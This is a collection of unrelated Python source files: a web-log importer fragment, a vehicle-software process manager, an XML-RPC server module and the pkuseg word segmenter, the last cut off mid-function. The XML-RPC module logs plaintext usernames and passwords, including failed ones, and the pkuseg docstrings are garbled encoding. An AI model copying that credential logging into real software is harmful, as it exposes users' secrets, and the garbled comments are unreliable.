hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except (ValueError, BaseFormatException):
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
hit.date = datetime.datetime.strptime(date_string, format.date_format)
except ValueError as e:
invalid_line(line, 'invalid date or invalid format: %s' % str(e))
continue
# Parse the timezone and subtract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php')
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
(is_filtered, reason) = self.is_filtered(hit)
if is_filtered:
filtered_line(line, reason)
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
config = Configuration()
# The piwik object depends on the config object, so we have to create
# it after creating the configuration.
piwik = Piwik()
# The init_token_auth method may need the piwik option, so we must call
# it after creating the piwik object.
config.init_token_auth()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
process.py
|
import importlib
import os
import signal
import struct
import time
import subprocess
from typing import Optional, List, ValuesView
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc: str, name: str) -> None:
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# add daemon name to cloudlog ctx
cloudlog.bind(daemon=name)
# exec the process
getattr(mod, 'main')()
except KeyboardInterrupt:
cloudlog.warning(f"child {proc} got SIGINT")
except Exception:
# can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs: List[str], cwd: str) -> None:
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process: Process, timeout: float) -> None:
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
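# Illustrative usage (hypothetical worker): poll-join a child for up to
# five seconds without tripping the Process.join(timeout) bug above.
#
#   p = Process(target=some_worker)  # some_worker is hypothetical
#   p.start()
#   join_process(p, 5.0)
#   if p.exitcode is None:
#       p.terminate()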
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
persistent = False
proc: Optional[Process] = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self) -> None:
pass
@abstractmethod
def start(self) -> None:
pass
def restart(self) -> None:
self.stop()
self.start()
def check_watchdog(self, started: bool) -> None:
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
# TODO: why can't pylint find struct.unpack?
self.last_watchdog_time = struct.unpack('Q', open(fn, "rb").read())[0] # pylint: disable=no-member
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
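# Sketch of the watchdog contract implied by the read above (assumption,
# not shown in this file): a monitored process periodically writes its
# current time in nanoseconds as an unsigned 64-bit value to its file.
#
#   with open(WATCHDOG_FN + str(os.getpid()), "wb") as f:
#       f.write(struct.pack('Q', int(sec_since_boot() * 1e9)))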
def stop(self, retry: bool=True, block: bool=True) -> Optional[int]:
if self.proc is None:
return None
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return None
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig: int) -> None:
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
# Can't signal if we don't have a pid
if self.proc.pid is None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.shouldBeRunning = self.proc is not None and not self.shutting_down
state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self) -> None:
pass
def start(self) -> None:
# In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info(f"starting process {self.name}")
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self) -> None:
if self.enabled:
cloudlog.info(f"preimporting {self.module}")
importlib.import_module(self.module)
def start(self) -> None:
# In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info(f"starting python {self.module}")
self.proc = Process(name=self.name, target=launcher, args=(self.module, self.name))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running across manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self) -> None:
pass
def start(self) -> None:
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info(f"starting daemon {self.name}")
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True) -> None:
pass
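# Note on the liveness check in start() above: os.kill(pid, 0) delivers
# no signal; it merely raises OSError if no such process exists. Minimal
# sketch (hypothetical pid):
#
#   try:
#       os.kill(pid, 0)
#       alive = True
#   except OSError:
#       alive = False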
def ensure_running(procs: ValuesView[ManagerProcess], started: bool, driverview: bool=False, not_run: Optional[List[str]]=None) -> None:
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif getattr(p, 'driverview', False) and driverview:
# TODO: why is driverview an argument here? can this be done with the name?
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
|
ro_XMLRPC.py
|
#
# ro_XMLRPC.py -- enhanced XML-RPC services for remoteObjects system
#
import sys
import threading
import traceback
import base64
import logging  # needed for the null-logger fallback in XMLRPCServer
from g2base import six
def dump_int(_, v, w):
w("<value><int>%d</int></value>" % (v))
if six.PY2:
import Queue
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler,
SimpleXMLRPCDispatcher)
from xmlrpclib import ServerProxy, Transport, Marshaller
Marshaller.dispatch[long] = dump_int
else:
import queue as Queue
from xmlrpc.server import (SimpleXMLRPCServer, SimpleXMLRPCRequestHandler,
SimpleXMLRPCDispatcher)
from xmlrpc.client import ServerProxy, Transport, Marshaller
# monkey-patch the Python xml-rpc marshaller so it does not complain
# about large integers
Marshaller.dispatch[int] = dump_int
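# Illustrative effect (hedged): the stock marshaller raises OverflowError
# for values outside the 32-bit XML-RPC <int> range; with dump_int
# installed, a value like 2**40 is serialized as
# <int>1099511627776</int> instead.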
try:
import fcntl
except ImportError:
fcntl = None
from g2base import Task
version = '20160912.0'
# Timeout value for XML-RPC sockets
socket_timeout = 0.25
class Error(Exception):
"""Class of errors raised in this module."""
pass
class socketTimeout(Error):
"""Raised when a socket times out waiting for a client."""
pass
#
# ------------------ CONVENIENCE FUNCTIONS ------------------
#
class ServiceProxy(object):
def __init__(self, url):
self.url = url
# transport = MyTransport()
#self.proxy = ServerProxy(self.url, transport=transport,
# allow_none=True)
#self.proxy = ServerProxy(self.url, allow_none=True)
#self.logger = logger
def call(self, attrname, args, kwdargs):
#transport = MyTransport()
#proxy = ServerProxy(self.url, transport=transport,
# allow_none=True)
proxy = ServerProxy(self.url, allow_none=True)
# getattr is safe here even for dotted method names: ServerProxy
# returns a callable _Method object for any attribute name.
method = getattr(proxy, attrname)
return method(*args, **kwdargs)
def make_serviceProxy(host, port, auth=None, secure=False, timeout=None):
"""
Convenience function to make a XML-RPC service proxy.
'auth' is None for no authentication, otherwise (user, passwd)
'secure' should be True if you want to use SSL, otherwise vanilla http.
"""
if auth is not None:
user, passwd = auth
try:
if secure:
if auth is not None:
url = 'https://%s:%s@%s:%d/' % (user, passwd, host, port)
else:
url = 'https://%s:%d/' % (host, port)
else:
if auth is not None:
url = 'http://%s:%s@%s:%d/' % (user, passwd, host, port)
else:
url = 'http://%s:%d/' % (host, port)
return ServiceProxy(url)
except Exception as e:
raise Error("Can't create proxy to service found on '%s:%d': %s" % (
host, port, str(e)))
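# Example usage (illustrative host/port):
#
#   svc = make_serviceProxy('localhost', 9000, auth=('user', 'passwd'))
#   result = svc.call('echo', ['hello'], {})
#
# Note that as written above, 'timeout' is accepted for API compatibility
# but is not applied to the URL or proxy.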
#
# ------------------ CLIENT EXTENSIONS ------------------
#
class MyTransport(Transport):
def request(self, host, handler, request_body, verbose=0):
try:
return self.single_request(host, handler, request_body, verbose)
finally:
try:
self.close()
except:
pass
#
# ------------------ THREADING EXTENSIONS ------------------
#
class ProcessingMixin(object):
"""Mix-in class to handle each request in a new thread."""
    def __init__(self, daemon=False, threaded=False, threadPool=None):
        self.daemon_threads = daemon
        # store these so the mixin works standalone; subclasses may overwrite
        self.threaded = threaded
        self.threadPool = threadPool
def verify_request(self, request, client_address):
#possible host-based authentication protection
ip, port = client_address
self.logger.debug("caller ip: %s:%d" % (ip, port))
#if not (ip in self.authorized_hosts):
# return False
return True
def process_request(self, request, client_address):
"""Optional multithreaded request processing."""
if self.threaded:
self.queue.put((request, client_address))
# Default behavior is single-threaded sequential execution
else:
self.do_process_request(request, client_address)
def do_process_request(self, request, client_address):
self.finish_request(request, client_address)
self.shutdown_request(request)
request.close()
#
# ------------------ XML-RPC SERVERS ------------------
#
class XMLRPCRequestHandler(SimpleXMLRPCRequestHandler):
"""Subclass SimpleXMLRPCRequestHandler to add basic HTTP authentication
check.
"""
# def __init__(self, *args, **kwdargs):
# SimpleXMLRPCRequestHandler.__init__(*args, **kwdargs)
def setup(self):
SimpleXMLRPCRequestHandler.setup(self)
# *** NOTE: NO KEEP-ALIVE!!! ***
# Keep-alive does not play well with multithreaded xml-rpc
self.server.close_connection = True
self.protocol_version = "HTTP/1.0"
def get_authorization_creds(self):
auth = self.headers.get("authorization", None)
logger = self.server.logger
#logger.debug("Auth is %s" % (str(auth)))
if auth is not None:
try:
method, auth = auth.split()
if method.lower() == 'basic':
#logger.debug("decoding base64...")
auth = base64.b64decode(auth.encode()).decode()
#logger.debug("splitting...")
username, password = auth.split(':')
logger.debug("username: '%s', password: '%s'" % (
username, password))
auth = { 'method': 'basic',
'username': username,
'password': password,
}
else:
logger.error("unsupported auth method: '%s'" % method)
auth = None
except Exception as e:
logger.error("unrecognized auth cred: '%s'" % auth,
exc_info=True)
auth = None
return auth
def _dispatch(self, method, params):
"""
Called to dispatch an XML-RPC request.
"""
auth = self.get_authorization_creds()
# Refer back to server to do the dispatch
return self.server.do_dispatch(method, params, auth,
self.client_address)
# Using the ProcessingMixin allows the XML-RPC server to handle more than
# one request at a time.
#
class XMLRPCServer(ProcessingMixin, SimpleXMLRPCServer):
"""
Basic XML-RPC server.
"""
# Note: cert_file param is just for constructor compatibility with
# SecureXMLRPCServer--it is ignored
def __init__(self, host, port, ev_quit=None, timeout=socket_timeout,
logger=None,
requestHandler=XMLRPCRequestHandler,
logRequests=False, allow_none=True, encoding=None,
threaded=False, threadPool=None, numthreads=5,
authDict=None, cert_file=None):
SimpleXMLRPCServer.__init__(self, (host, port),
requestHandler=requestHandler,
logRequests=logRequests,
allow_none=allow_none, encoding=encoding)
ProcessingMixin.__init__(self, threaded=threaded, threadPool=threadPool)
if logger:
self.logger = logger
else:
self.logger = logging.Logger('null')
# Our termination flag
if not ev_quit:
self.ev_quit = threading.Event()
else:
self.ev_quit = ev_quit
# Defines how responsive to termination we are
self.timeout = timeout
self.authDict = authDict
self.threaded = threaded
self.threadPool = threadPool
self._num_threads = numthreads
# Create an attribute to hold the Queue object. The actual
# Queue object will be created in the start method if this
# server is to be run in threaded mode.
self.queue = None
# Make XML-RPC sockets not block indefinitely
#self.socket.settimeout(timeout)
# Override anemic limit of python's default SocketServer
self.socket.listen(64)
# [Bug #1222790] If possible, set close-on-exec flag; if a
# method spawns a subprocess, the subprocess shouldn't have
# the listening socket open.
if fcntl is not None and hasattr(fcntl, 'FD_CLOEXEC'):
flags = fcntl.fcntl(self.fileno(), fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(self.fileno(), fcntl.F_SETFD, flags)
def start(self, use_thread=True):
# Threaded server. Start N workers either as new threads or using
# the thread pool, if we have one.
if self.threaded:
# queue for communicating with workers
self.queue = Queue.Queue()
for i in range(self._num_threads):
                if self.threadPool is None:
thread = threading.Thread(target=self.worker,
name="RPC-Worker-%d" % (i+1),
args=[i, self.queue])
thread.daemon = False
thread.start()
else:
task = Task.FuncTask2(self.worker, i, self.queue)
self.threadPool.addTask(task)
if not use_thread:
self.serve_forever()
else:
            if self.threadPool is None:
thread = threading.Thread(target=self.serve_forever)
                thread.daemon = True
thread.start()
else:
task = Task.FuncTask2(self.serve_forever)
self.threadPool.addTask(task)
def stop(self):
# If this server has a Queue, put a message on the queue to
# tell the threads to shutdown.
if self.queue is not None:
self.queue.put((None, None))
# use another thread to call shutdown because if we happen to
# be in the same thread as server_forever() it will deadlock
thread = threading.Thread(target=self.shutdown)
thread.start()
self.ev_quit.set()
#self.server_close()
def worker(self, i, queue):
self.logger.info("worker %d spinning up..." % (i))
while not self.ev_quit.isSet():
try:
# NOTE: if timeout is specified, then performance
# drops *substantially*.
tup = queue.get(block=True, timeout=None)
assert len(tup) == 2, \
Error("Invalid queue contents: len(tup) != 2 (%d)" % (
len(tup)))
request, client_address = tup
                if request is None:
                    # Put termination sentinel back on the queue for other
                    # workers to discover and terminate
queue.put(tup)
break
except Queue.Empty:
continue
try:
self.do_process_request(request, client_address)
except Exception as e:
self.logger.error("Error processing request: %s" % (str(e)))
self.logger.info("worker %d shutting down..." % (i))
def authenticate_client(self, methodName, params, auth, client_address):
# this is the caller's ip address and port
ip, port = client_address
if not auth:
self.logger.error("No authentication credentials passed")
raise Error("Service requires authentication and no credentials passed")
# this is the client authentication, pulled from the HTTP header
try:
username = auth['username']
password = auth['password']
except KeyError:
self.logger.error("Bad authentication credentials passed")
raise Error("Service only handles 'basic' authentication type")
if not username in self.authDict:
self.logger.error("No user matching '%s'" % username)
self.logger.info("authdict is '%s'" % str(self.authDict))
# sleep thwarts brute force attacks
# but also delays applications when there is a legitimate
# authentication mismatch
#time.sleep(1.0)
raise Error("Service requires authentication; username or password mismatch")
if self.authDict[username] != password:
self.logger.error("Password incorrect '%s'" % password)
# sleep thwarts brute force attacks
time.sleep(1.0)
raise Error("Service requires authentication; username or password mismatch")
self.logger.debug("Authorized client '%s'" % (username))
def do_dispatch(self, methodName, params, auth, client_addr):
try:
if self.authDict:
self.authenticate_client(methodName, params, auth, client_addr)
# log all method calls, but truncate params to a reasonable size
# in case a huge parameter(s) was sent
self.logger.debug("calling method %s(%s)" % (str(methodName),
str(params)[:500]))
response = SimpleXMLRPCDispatcher._dispatch(self, methodName,
params)
#response = self.my_dispatch(methodName, params, auth, client_addr)
self.logger.debug("response is: %s" % str(response))
return response
except Exception as e:
self.logger.error("Method %s raised exception: %s" % (str(methodName),
str(e)))
try:
                (exc_type, exc_value, tb) = sys.exc_info()
tb_str = ("Traceback:\n%s" % '\n'.join(traceback.format_tb(tb)))
self.logger.error(tb_str)
except:
self.logger.error("Traceback information unavailable")
raise e
def get_serverClass(secure=False):
return XMLRPCServer
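# Minimal server sketch (the port, registered function and threading choice
# are only examples; register_function is inherited from SimpleXMLRPCServer):
#
#     server = XMLRPCServer('localhost', 9000, threaded=True)
#     server.register_function(lambda x: x + 1, 'incr')
#     server.start()
#     ...
#     server.stop()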
#END
|
__init__.py
|
from __future__ import print_function
import sys
if sys.version_info[0] < 3:
print("pkuseg does not support python2", file=sys.stderr)
sys.exit(1)
import os
import time
import multiprocessing
from multiprocessing import Process, Queue
import pkuseg.trainer as trainer
import pkuseg.inference as _inf
from pkuseg.config import config
from pkuseg.feature_extractor import FeatureExtractor
from pkuseg.model import Model
class TrieNode:
"""ๅปบ็ซ่ฏๅ
ธ็Trieๆ ่็น"""
def __init__(self, isword):
self.isword = isword
self.children = {}
class Preprocesser:
"""้ขๅค็ๅจ๏ผๅจ็จๆท่ฏๅ
ธไธญ็่ฏๅผบๅถๅๅฒ"""
def __init__(self, dict_file):
"""ๅๅงๅๅปบ็ซTrieๆ """
self.dict_data = dict_file
if isinstance(dict_file, str):
with open(dict_file, encoding="utf-8") as f:
lines = f.readlines()
self.trie = TrieNode(False)
for line in lines:
self.insert(line.strip())
else:
self.trie = TrieNode(False)
for w in dict_file:
assert isinstance(w, str)
self.insert(w.strip())
def insert(self, word):
"""Trieๆ ไธญๆๅ
ฅๅ่ฏ"""
l = len(word)
now = self.trie
for i in range(l):
c = word[i]
if not c in now.children:
now.children[c] = TrieNode(False)
now = now.children[c]
now.isword = True
def solve(self, txt):
"""ๅฏนๆๆฌ่ฟ่ก้ขๅค็"""
outlst = []
iswlst = []
l = len(txt)
last = 0
i = 0
while i < l:
now = self.trie
j = i
found = False
while True:
c = txt[j]
if not c in now.children:
break
now = now.children[c]
j += 1
if now.isword:
found = True
break
if j == l:
break
if found:
if last != i:
outlst.append(txt[last:i])
iswlst.append(False)
outlst.append(txt[i:j])
iswlst.append(True)
last = j
i = j
else:
i += 1
if last < l:
outlst.append(txt[last:l])
iswlst.append(False)
return outlst, iswlst
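# Illustrative behaviour of Preprocesser.solve; "york" is a made-up dictionary
# entry used only for this sketch:
#
#     Preprocesser(["york"]).solve("newyorkcity")
#     # -> (["new", "york", "city"], [False, True, False])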
class Postprocesser:
"""ๅฏนๅ่ฏ็ปๆๅๅค็"""
def __init__(self, common_name, other_name):
if common_name is None and other_name is None:
self.do_process = False
return
self.do_process = True
if common_name is None:
self.common_words = set()
else:
with open(common_name, encoding='utf-8') as f:
lines = f.readlines()
self.common_words = set(map(lambda x:x.strip(), lines))
if other_name is None:
self.other_words = set()
else:
with open(other_name, encoding='utf-8') as f:
lines = f.readlines()
self.other_words = set(map(lambda x:x.strip(), lines))
def post_process(self, sent, check_seperated):
for m in reversed(range(2, 8)):
end = len(sent)-m
if end < 0:
continue
i = 0
while (i < end + 1):
merged_words = ''.join(sent[i:i+m])
if merged_words in self.common_words:
do_seg = True
elif merged_words in self.other_words:
if check_seperated:
seperated = all(((w in self.common_words)
or (w in self.other_words)) for w in sent[i:i+m])
else:
seperated = False
if seperated:
do_seg = False
else:
do_seg = True
else:
do_seg = False
if do_seg:
for k in range(m):
del sent[i]
sent.insert(i, merged_words)
i += 1
end = len(sent) - m
else:
i += 1
return sent
def __call__(self, sent):
if not self.do_process:
return sent
return self.post_process(sent, check_seperated=True)
class pkuseg:
def __init__(self, model_name="default", user_dict="default"):
"""ๅๅงๅๅฝๆฐ๏ผๅ ่ฝฝๆจกๅๅ็จๆท่ฏๅ
ธ"""
# print("loading model")
# config = Config()
# self.config = config
if model_name in ["default"]:
config.modelDir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"models",
model_name,
)
else:
config.modelDir = model_name
# config.fModel = os.path.join(config.modelDir, "model.txt")
if user_dict == "default":
# file_name = os.path.join(
# os.path.dirname(os.path.realpath(__file__)),
# "dicts", "default_common.txt",
# )
file_name = None
other_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.txt",
)
else:
file_name = user_dict
other_name = None
# self.preprocesser = Preprocesser(file_name)
self.preprocesser = Preprocesser([])
self.postprocesser = Postprocesser(file_name, other_name)
self.feature_extractor = FeatureExtractor.load()
self.model = Model.load()
self.idx_to_tag = {
idx: tag for tag, idx in self.feature_extractor.tag_to_idx.items()
}
# self.idx2tag = [None] * len(self.testFeature.tagIndexMap)
# for i in self.testFeature.tagIndexMap:
# self.idx2tag[self.testFeature.tagIndexMap[i]] = i
# if config.nLabel == 2:
# B = B_single = "B"
# I_first = I = I_end = "I"
# elif config.nLabel == 3:
# B = B_single = "B"
# I_first = I = "I"
# I_end = "I_end"
# elif config.nLabel == 4:
# B = "B"
# B_single = "B_single"
# I_first = I = "I"
# I_end = "I_end"
# elif config.nLabel == 5:
# B = "B"
# B_single = "B_single"
# I_first = "I_first"
# I = "I"
# I_end = "I_end"
# self.B = B
# self.B_single = B_single
# self.I_first = I_first
# self.I = I
# self.I_end = I_end
self.n_feature = len(self.feature_extractor.feature_to_idx)
self.n_tag = len(self.feature_extractor.tag_to_idx)
# print("finish")
def _cut(self, text):
"""
็ดๆฅๅฏนๆๆฌๅ่ฏ
"""
examples = list(self.feature_extractor.normalize_text(text))
length = len(examples)
all_feature = [] # type: List[List[int]]
for idx in range(length):
node_feature_idx = self.feature_extractor.get_node_features_idx(
idx, examples
)
# node_feature = self.feature_extractor.get_node_features(
# idx, examples
# )
# node_feature_idx = []
# for feature in node_feature:
# feature_idx = self.feature_extractor.feature_to_idx.get(feature)
# if feature_idx is not None:
# node_feature_idx.append(feature_idx)
# if not node_feature_idx:
# node_feature_idx.append(0)
all_feature.append(node_feature_idx)
_, tags = _inf.decodeViterbi_fast(all_feature, self.model)
words = []
current_word = None
is_start = True
for tag, char in zip(tags, text):
if is_start:
current_word = char
is_start = False
elif "B" in self.idx_to_tag[tag]:
words.append(current_word)
current_word = char
else:
current_word += char
if current_word:
words.append(current_word)
return words
def cut(self, txt):
"""ๅ่ฏ๏ผ็ปๆ่ฟๅไธไธชlist"""
txt = txt.strip()
ret = []
if not txt:
return ret
        imary = txt.split()  # split on whitespace into fragments
        # segment each fragment
for w0 in imary:
if not w0:
continue
            # split into further fragments according to the user dictionary
lst, isword = self.preprocesser.solve(w0)
for w, isw in zip(lst, isword):
if isw:
ret.append(w)
continue
output = self._cut(w)
ret.extend(self.postprocesser(output))
return ret
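# Minimal usage sketch (assumes the default model files are installed; the
# sentence and its segmentation are only illustrative):
#
#     seg = pkuseg()
#     print(seg.cut("我爱北京天安门"))  # e.g. ['我', '爱', '北京', '天安门']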
def train(trainFile, testFile, savedir, nthread=10):
"""็จไบ่ฎญ็ปๆจกๅ"""
# config = Config()
starttime = time.time()
if not os.path.exists(trainFile):
raise Exception("trainfile does not exist.")
if not os.path.exists(testFile):
raise Exception("testfile does not exist.")
if not os.path.exists(config.tempFile):
os.makedirs(config.tempFile)
if not os.path.exists(config.tempFile + "/output"):
os.mkdir(config.tempFile + "/output")
# config.runMode = "train"
config.trainFile = trainFile
config.testFile = testFile
config.modelDir = savedir
# config.fModel = os.path.join(config.modelDir, "model.txt")
config.nThread = nthread
os.makedirs(config.modelDir, exist_ok=True)
trainer.train(config)
# pkuseg.main.run(config)
# clearDir(config.tempFile)
print("Total time: " + str(time.time() - starttime))
def _test_single_proc(
input_file, output_file, model_name="default", user_dict="default", verbose=False
):
times = []
times.append(time.time())
seg = pkuseg(model_name, user_dict)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
results = []
for line in lines:
results.append(" ".join(seg.cut(line)))
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(results))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = ["load_model", "read_file", "word_seg", "write_file"]
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def _proc_deprecated(seg, lines, start, end, q):
for i in range(start, end):
l = lines[i].strip()
ret = seg.cut(l)
q.put((i, " ".join(ret)))
def _proc(seg, in_queue, out_queue):
# TODO: load seg (json or pickle serialization) in sub_process
# to avoid pickle seg online when using start method other
# than fork
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
out_queue.put((idx, " ".join(seg.cut(line))))
def _proc_alt(model_name, user_dict, in_queue, out_queue):
seg = pkuseg(model_name, user_dict)
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
out_queue.put((idx, " ".join(seg.cut(line))))
def _test_multi_proc(
input_file,
output_file,
nthread,
model_name="default",
user_dict="default",
verbose=False,
):
alt = multiprocessing.get_start_method() == "spawn"
times = []
times.append(time.time())
if alt:
seg = None
else:
seg = pkuseg(model_name, user_dict)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
in_queue = Queue()
out_queue = Queue()
procs = []
for _ in range(nthread):
if alt:
p = Process(
target=_proc_alt,
args=(model_name, user_dict, in_queue, out_queue),
)
else:
p = Process(target=_proc, args=(seg, in_queue, out_queue))
procs.append(p)
for idx, line in enumerate(lines):
in_queue.put((idx, line))
for proc in procs:
in_queue.put(None)
proc.start()
times.append(time.time())
result = [None] * len(lines)
for _ in result:
idx, line = out_queue.get()
result[idx] = line
times.append(time.time())
for p in procs:
p.join()
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
